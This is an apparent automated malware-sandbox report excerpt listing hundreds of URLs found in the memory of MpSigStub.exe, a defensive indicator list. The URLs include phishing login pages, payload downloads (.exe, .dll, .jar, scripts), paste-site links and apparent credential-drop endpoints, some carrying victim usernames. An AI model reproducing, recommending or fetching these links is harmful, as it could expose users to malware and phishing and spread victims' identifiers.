Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: https://joro4wixma.azurewebsites.net/wp-admin
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: https://josematechky.com/docs/ec21_order.doc
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://jovial-pasteur.159-89-118-202.plesk.page/wp-content/uploads/index.php
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: https://jrat.io
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: https://js-cloud.com/gate.php?token=
Source: MpSigStub.exe, 00000026.00000003.18350359042.00000138BE7B7000.00000004.00000001.sdmp	String found in binary or memory: https://juniorleadersacademy.com/reporthotmail.php
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: https://jupiternepal.com/name/stducount/php/
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	String found in binary or memory: https://kamalandcompany.com/drms/fert.html
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://kennethfantes.com/ve/qas.EXE
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: https://kenosis.ml/wp-content/upgrabe/
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://kiki-lo.online/?e=ckomorowski
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: https://kinzlerimmigration.com/wp_include/redirect/anvsawuuy2fydgvyqhridmmuy29t
Source: MpSigStub.exe, 00000026.00000003.18330827201.00000138BE3D8000.00000004.00000001.sdmp	String found in binary or memory: https://kiosp.dyndns.dk/icon4/next.php
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://kiwisanagustin.com/wp-admin/includes/opo.php
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: https://kiwisanagustin.com/wp-admin/includes/opo.php%22%20method%3d%22post%22%20style%3d%22box-sizin
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: https://kod.haohaoda.cn/plugins/picasa/newpo.png
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: https://kofiruions.xyz/royal/brand.php
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: https://koirado.com/vendor/phpunit/phpunit/src/util/php/css/dir/
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://konzmny.com/?qs=a9537c1ce6614636144ad0c9e0975ac106bb986006db8f6a0789e5b0d16dcf4fc15476ba5afa
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: https://koooking.online/webs/
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	String found in binary or memory: https://kraft.eng.br/
Source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp	String found in binary or memory: https://kurtoch.eu/rgfyzrxlr/ind.html
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: https://kweraltd.com/wp-content/plugins
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: https://labrie-sabette.com/wp-includes/sodiu
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://laurienmcbride.com/maesrskchibuzor/report-maerskline.php
Source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp	String found in binary or memory: https://lawyersblog.net/777/picture9.dll
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: https://legalproceedings.uc.r.appspot.com/legal_proceeding_concerning_overdue_invoices_pdf.jar
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: https://linkr.uk/2nuds
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: https://linkr.uk/elgja
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: https://linkr.uk/fyu5r
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://linkzip.me/
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://listoparacomer.com.ve/wp-content/hewlett-packard-mcafee/hpe.html
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: https://litesound.ml/fax/policy.php
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: https://livesnoop.com/client/postlog.php
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: https://livesnoop.com/client/screenshots.php
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: https://lixns.com/xl/?referrer=
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: https://localmonero.co/
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/geolocate?key=test
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: https://login.livevoice365.xyz/
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	String found in binary or memory: https://login.microsoftonline.com
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	String found in binary or memory: https://login.microsoftonline.com/common/oauth2/
Source: MpSigStub.exe, 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp	String found in binary or memory: https://login.yahoo.com/config/login
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: https://logins.daum.net/accounts/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: https://logins.daum.net/accounts/logout.do?url=http%3A%2F%2Fwww.daum.net%2F%3Fnil_profile%3Dlogout
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: https://logowrench.website/zdz0ptxdtonla.php
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: https://logs1186.xiti.com/
Source: MpSigStub.exe, 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp	String found in binary or memory: https://logupdate.herokuapp.com
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://longurl.in/ekdnl
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://longurl.in/htyul
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://longurl.in/mccwd
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://longurl.in/tllwu
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://longurl.in/welhl
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: https://lupoun.com/
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: https://lupoun.com/moon/
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: https://m3lloyellow.com/rodrich.php
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://macflypro.com/builds/data/
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: https://maersoul.com/vix/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: https://mail.daum.net
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: https://mail.daum.net/login?url=http%3A%2F%2Fmail.daum.net%2F
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: https://mailsending.site/Happy_CS/happyFun.exe
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: https://main.iam.ad.ext.azure.com/api/
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: https://malsay.myftp.biz/ck/business/index.php
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: https://mamulln.cl/kwi/?email=travis_phillips
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: https://marcostrombetta.com.br/ds/1802.Dc
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: https://marcostrombetta.com.br/ds/1802.gif
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://massotherapielg.com/css/acrobat/login.micosoftonline.com/index.html
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: https://maxizoner.com/presentation.dll
Source: MpSigStub.exe, 00000026.00000003.18350359042.00000138BE7B7000.00000004.00000001.sdmp	String found in binary or memory: https://mazedecrypt.top/
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://md.jp-long.online/?e=robertm
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: https://md.jp-long.online/?e=vpetrillo
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	String found in binary or memory: https://md.klnmailbox.xyz/?e=
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://mdhov.ca/storage/mdhov/ca/next.php
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	String found in binary or memory: https://mdspni.com/realm/send.php
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: https://meant.usa.cc/no/sharpoin/sharpoint/share/
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://media.discordapp.net/attachments/
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://mediadigital.site/class-vc.php
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	String found in binary or memory: https://megoseri.com/app.dll%/cvr78f2.tmp.cvr
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://melifotopoulos.gr/components/report-maerskline.php
Source: MpSigStub.exe, 00000026.00000003.18303554710.00000138BE851000.00000004.00000001.sdmp	String found in binary or memory: https://mercados247.com/ds/1602.gif
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://message-read.iosmail-inbox.host/5c36dfff53edaf584b5d9262?qlpq7hq=&amp
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: https://meubackup.terra.com.br/index.php/s/4fwo4jtezhqnzdd/download
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://mhjyutrfgf.gb.net/grte544fc3/?vfegg5355=fvvbveg545
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: https://minhafinanca.com/wp-admin/css/colors/coffee/reportexcelindeed
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: https://minisnowhair.com/minisnw2/download2.php?f=htm-2-ads19u09ue11&u=22fc8bcc-db88-4ca7-9654-81ad4
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: https://miscrsftonline.ml/blessing/policy.php
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: https://missglamourcosmeticos.com.br/ds/29.gif
Source: MpSigStub.exe, 00000026.00000003.18343624782.00000138BE12C000.00000004.00000001.sdmp	String found in binary or memory: https://mjstech1.com/06/lub.php
Source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp	String found in binary or memory: https://mmjobserver.com/aah/next.php
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: https://moegifts.com/ds/161120.gif
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: https://mollahossein.ir/cgi_bin/bgxlc3rlckblyxn0bwfulmnvbq==
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://mor32.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: https://moralsss.com/office/office365/index.php
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://moranmus.com/adobe-vix/
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	String found in binary or memory: https://mort2021.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: https://msatechnology.com/admincp/wp-admin/css/colors/ectoplasm/reportexcel.php
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: https://mtonlino.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: https://muropronto.ibsweb.com.br/modules/mod_simplefileuploadv1.3/
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: https://mycrotyx.com/cgi.bin/azure2020/realm/send.php
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: https://myexternalip.com/raw
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: https://myexternalip.com/rawx
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://mylovelybluesky.com
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://myoffice365-online.com/login/common/login/mridings
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: https://myscape.in/ds/161120.gif
Source: MpSigStub.exe, 00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp	String found in binary or memory: https://mywebscrap.com/ds/0402.gif
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: https://mz.ht-aslice.online/?e=a.wirth
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://mz.ht-aslice.online/?e=erdinc.gok
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: https://mz.ht-aslice.online/?e=mike.platt
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: https://n9.cl/d9fii
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: https://navigator.fun/wp-content/plugins/refer-a-friend-for-woocommerce-by-wpgens/public/js/mcb8abrb
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://netorgft3012202.sharepoint.com/:b:/s/investments/ewhzfsivbvbdn1vhk8eejpcbnbcaan_xlbd5e7fn2lp
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: https://neuroconversions.com/wp-content/
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: https://neuroconversions.com/wp-content/plugins/po4/excelz/index.php?email=
Source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp	String found in binary or memory: https://neverlose.cc/
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://newsiest-grid.000webhostapp.com/dhl/dhla/dhl%20auto/index.php?email=kani.junichi
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: https://newtrp.com/e8/rexifly.php
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://newwets.com/zip/document.php
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://nexustiles.com/y29yaw5uzs5oewxhbmrac2fudgfjcnv6y291bnr5lnvz
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: https://nhacaiuytin888.com/mail/now.php
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://nicoleiman.com/zmxvcmvuy2lhqhnpbxrly2guys1zdgfylmvkds5zzw==
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: https://nizarazu.ru/tyui/?activity=4789652
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: https://nonamesv.xsiazon.xyz/?e=
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: https://norsecompassgroup.com/4eqmrlzmq9r/lipa.html
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://notabug.org/microsoft-office/word-templates/raw/master/template.dotm
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: https://notafiscaleletronica-e.com/master/
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	String found in binary or memory: https://notes.topix21century.com/asp/kys_allow_get.asp?name=getkys.kys
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://novaworld-resort.com/wp-admin/user/delis/ite1/links.doc
Source: MpSigStub.exe, 00000026.00000003.18306564142.00000138BD4E3000.00000004.00000001.sdmp	String found in binary or memory: https://nowfoundation.org.uk/hx0smmmbiw/haurt.html
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: https://oauth2.googleapis
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: https://objectstorage.uk-london-1.oraclecloud.com/n/lrxg46lu57ma/
Source: MpSigStub.exe, 00000026.00000003.18306821141.00000138BD516000.00000004.00000001.sdmp	String found in binary or memory: https://objectstorage.us-ashburn-1.oraclecloud.com/n/idb0azuxzsop/b/viperwee/o/voicee.mp3
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://objectstorage.us-phoenix-1.oraclecloud.com/n/axfwptiilgjl/b/azu/o/vn.html#support
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://oemands.dk/xmlrpc.php
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: https://office.com/start/myaccount.aspx
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://office.insureusun.com/?e=simona.merzagora
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: https://office.live.com/start/
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://office365.com
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://ohgstd-adnazad.c9users.io/update/validate/
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: https://oidblueprin.at/3/str.dll
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: https://olisseytravel.az/wp-content/themes/themesnewsa/js/zxz/new.php
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: https://olympiacus.accesscam.org/pdf/opo.php
Source: MpSigStub.exe, 00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp	String found in binary or memory: https://one.co.il
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: https://onedrive.live.com/download.aspx?cid=7df9938cb8d94df3&authkey=%21ajy8jfax0aqsibs&resid=7df993
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://onestoprnd.com/wp-content/plugins_new/1902/next.php
Source: MpSigStub.exe, 00000026.00000003.18306564142.00000138BD4E3000.00000004.00000001.sdmp	String found in binary or memory: https://opposedent.com/css/main.css/send.css
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: https://organigrama.gualda.com
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://ostoja.tk/browser.php
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: https://ourcomm.co.uk/wp-content/plugins/buddyboss-platfo
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: https://outlook.office.com/api/
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: https://ov.m4sh-up1x.xyz/?e=
Source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp	String found in binary or memory: https://ovjdyp9iz3r.typeform.com/to/kpapmnfe
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: https://ozmontelectrical.com/drms/fert.html
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: https://paf.gov-mail.net/13621/1/18844/2/0/0/1390324815/files-b74d99d6/hta
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://panolinuk-my.sharepoint.com/:b:/g/personal/paul_holland_panolin_co_uk/eewdyq0-yzdfhxzreappqk
Source: MpSigStub.exe, 00000026.00000003.18337788205.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://paste.ee/d/n9jsq/0
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://paste.ee/r/26jiy/0
Source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp	String found in binary or memory: https://paste.ee/r/cikn9/0
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com/
Source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com/raw/
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com/raw/E1MURCfS
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com/raw/G0jcGs79
Source: MpSigStub.exe, 00000026.00000003.18350786721.00000138BD66E000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com/raw/g10EQ6PS
Source: MpSigStub.exe, 00000026.00000003.18336277246.00000138BD3DA000.00000004.00000001.sdmp	String found in binary or memory: https://pastebinp.com/raw/1Tuj3CF7
Source: MpSigStub.exe, 00000026.00000003.18336277246.00000138BD3DA000.00000004.00000001.sdmp	String found in binary or memory: https://pastebinp.com/raw/itDEZ39X
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://paxful.com
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://pay.2go.com/payment/2-1301222-qoo1mwri7zqbuxa2)
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	String found in binary or memory: https://pay.yac.mx
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	String found in binary or memory: https://pay.yac.mxx:
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: https://pd.gy-lnoice.online/?e=dskodras
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: https://pediatriadrgonzales.com/wp-content/themes/betheme/js/parallax/vrgcm7nkd.php
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: https://peregrineplastics-my.sharepoint.com/:o:/g/personal/bsmith_peregrine_build/erg-sjvfekzmix8xbx
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://petlineir.com/mason/amstream.exe
Source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp	String found in binary or memory: https://photofinderplus.com/s/?api=
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://piedmontrescue.org/sport/rockstar.php
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: https://pigeonious.com/
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: https://pigeonious.com/img/
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	String found in binary or memory: https://pinkconnext.com/ds/26.gif
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: https://piscineconstruct.ro/kjy/index.php
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: https://pjoao1578pro2.site/crypt/vbscript.txt
